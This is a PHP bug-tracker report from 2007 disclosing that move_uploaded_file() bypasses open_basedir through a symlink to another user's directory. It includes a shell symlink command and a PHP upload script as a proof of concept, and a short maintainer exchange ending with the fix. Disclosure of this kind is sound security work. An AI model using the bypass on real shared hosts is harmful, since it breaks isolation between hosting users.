|  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #40931 open_basedir bypass via symlink and move_uploaded_file()
Submitted: 2007-03-27 18:30 UTC Modified: 2007-04-10 22:31 UTC
From: vladimir at petrov dot ks dot ua Assigned: tony2001
Status: Closed Package: Safe Mode/open_basedir
PHP Version: 5.2.1 OS: Linix
Private report: No CVE-ID:
 [2007-03-27 18:30 UTC] vladimir at petrov dot ks dot ua
User can bypass open_basedir restriction by move_uploaded_file() if target file path is symlink to any directory.

Reproduce code:
user1 will upload file to user2's /home/user2/public_html folder.

We have in /etc/passwd:

Target folder allows to write for anybody:
# ls -lA /home/user2
drwxrwxrwx  2 user2 user2 4096 Mar 27 17:31 public_html/

Apache have mod_php intalled. Apache config for user1:
DocumentRoot /home/user1/public_html
User user1
php_admin_value open_basedir "/home/user1"

User user1 can do something like:

$ cd /home/user1/public_html/
$ ln -s /home/user2/public_html user2_public_html
$ echo '<html><body> 
if ( isset($_FILES["userfile"]) ) {
    echo "Upload ";
    if (move_uploaded_file ($_FILES["userfile"]["tmp_name"],"/home/user1/public_html/user2_public_html/file.ext"))
         echo "ok";
    else echo "failed";

<form name="uplform" method="post" action="<?=$PHP_SELF?>" enctype="multipart/form-data"> 
<input type="file" name="userfile"> 
<input type="submit"> 
</body></html>' > upload.php

Expected result:
If we access after file upload expected message
"Upload failed"
and no file 
in target folder.

Actual result:
If we access after file upload we got message
"Upload ok"
and file 
well exist in target folder.


Add a Patch

Pull Requests

Add a Pull Request


AllCommentsChangesGit/SVN commitsRelated reports
 [2007-03-27 18:40 UTC]
Make sure the open_basedir option is actually used and not overriden in another way.
 [2007-03-27 19:59 UTC] vladimir at petrov dot ks dot ua
open_basedir actually used.
If I try to write directly to target directory by


I got proper error message in browser and in the apache error log.
 [2007-03-27 20:33 UTC]
Cannot reproduce.
 [2007-03-27 21:19 UTC] vladimir at petrov dot ks dot ua
I have sent access information to my server to
I see this bug really working.
 [2007-04-10 22:31 UTC]
This bug has been fixed in CVS.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
Thank you for the report, and for helping us make PHP better.

PHP Copyright © 2001-2015 The PHP Group
All rights reserved.
Last updated: Thu Nov 26 23:01:33 2015 UTC